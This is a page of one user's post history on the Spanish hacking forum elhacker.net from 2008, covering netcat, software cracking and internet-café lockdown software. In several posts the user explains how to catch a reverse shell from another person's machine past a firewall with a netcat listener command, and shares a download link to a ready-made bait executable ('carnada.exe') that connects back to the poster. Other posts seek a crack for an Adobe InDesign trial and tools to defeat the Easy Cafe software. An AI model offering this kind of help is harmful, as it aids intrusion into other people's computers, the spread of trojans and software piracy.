elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Hacking / Re: Jugando con netcat en: 23 Agosto 2008, 12:30 pm
No, acá el problema es q necesitas un servidor SMTP q te envíe el mail, xq netcat sólo actúa como cliente de correo, y entonces necesitarías un servidor y para eso está el mini relay que se muestra en la práctica. ;)
2  Programación / Ingeniería Inversa / Re: Perdón por la brutalidad en: 22 Agosto 2008, 21:29 pm
Ok, muchas gracias, ya lo estoy descargando.
3  Seguridad Informática / Hacking / Re: Jugando con netcat en: 22 Agosto 2008, 21:16 pm
En realidad lo que estás tratando de hacer es una conexión directa, por lo que si el chavo tiene cortafuegos no lograrás nada, para evitar eso está esta práctica, la mayorá de los cortafuegos no permiten las conexiones entrantes, pero suelen permitir todas las salientes, y de eso se trata este subforo, si él intenta conectarse a tí (página 1) la sintaxis sería: -vv -L -p 80 (suponiendo que hubieras seguido las instrucciones al pie de la letra obtendrias su shell.

Otra opción es esta: http://foro.elhacker.net/tutoriales_documentacion/manual_de_netcat-t87109.0.html

Pero recuerga lo del cortafuegos, te recomendaría leer las revistas HxC, aunq son viejas, pero tienen varias formas interesantes de saltarse un cortafuegos que te darán una idea realmente importante.
4  Programación / Ingeniería Inversa / Re: Perdón por la brutalidad en: 18 Agosto 2008, 12:56 pm
Bueno la verdad muchas gracias, la verdad sí estuve leyendo las reglas del foro, y stuve leyendo bastante sobre el tema, el problema es que ya no quiero seguir crackeando cositas chiquitas, así no avanzo... aunque aún soy muy nuevo en el cracking estoy intentando avanzar un poco más allá, aún casi sin ayuda, debido a la escacez de material consistente sobre el tema en la web.

Desde ya gracias por la ayuda, espero no haber sido molestia para aquellos que por saber más se desprecian a los que empiezan, y se olvidan de que ellos también tuvieron que empezar desde abajo...
5  Programación / Ingeniería Inversa / Perdón por la brutalidad en: 16 Agosto 2008, 18:54 pm
Uy disculpenme por la brutalidad, pues no me di cuenta mientras escribía :-[


Citar
Disculpenme las molestias colegas, pero me gustaría q me dijeran si tienen algún Crack para Adobe InDesign CS2 Trial, que está muy bueno, pero no he conseguido crackearlo de ninguna manera... :-\
Lo único que he conseguido urgando por la red ha sido el serial, pero esta versión trial no pide serial nunca, te envia un link para comprarlo en linea...
desde ya se los agradezco :rolleyes:


La idea no era la de pedir un crack o serial sino una sugerencia para kien conociese el programa, de como llegar a liberarlo (crackearlo --sin links-- o algo así)...se supone que esto es un subforo de "Ingeniería Inversa" no??, mal yo... :(

En el caso de que haya hecho algo grave les ruego me disculpenn y me den una mano de algún otro tipo. :P.
Les aseguro esto no volverá a suceder....


LinuxVsWindows
6  Seguridad Informática / Hacking / Re: Jugando con netcat en: 16 Agosto 2008, 00:13 am
No seas lambeta, eso es un proyecto probado, aunque funcione, el tema de registro en ese link está mal, ya subiré el correcto
7  Seguridad Informática / Hacking / Re: Todo para burlar cybers en: 13 Agosto 2008, 23:58 pm
Alguien tiene algo para Easy Cafe, eso estaría bien
Gracias
8  Seguridad Informática / Hacking / Re: Todas las revistas de HackxCrack en PDF!! (no escaneadas) en: 13 Agosto 2008, 23:49 pm
Bien ten paciencia, la iré subiendo a medida que tengo tiempo, pero a pesar de ser originales la 6 es escaneada, pero está en muy buena calidad, las subiré a mediafire para que puedas bajarlas todas a la vez
9  Seguridad Informática / Hacking / Re: Jugando con netcat en: 8 Agosto 2008, 23:12 pm
Para el que kería el carnada.exe q lo baje desde este link, tiene el nombre Listo.exe


http://www.mediafire.com/download.php?jmifc46vp3y


Nota: ya está armado, por lo tanto tienes que cambiarle la Ip, o Dns xq ese es el mío, ah!! y de vez en cuanto intenta hackearme.... (jejeje  >:D)
10  Seguridad Informática / Hacking / Re: Jugando con netcat en: 6 Agosto 2008, 14:22 pm
Ahí te va uno para conexiones remotas para conexiones remotas:

http://foro.elhacker.net/tutoriales_documentacion/manual_de_netcat-t87109.0.html

Y otro q sta Muy bueno:


http://zodiac-mitm.blogspot.com/2007/10/manual-netcat.html

 :xD :laugh:
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines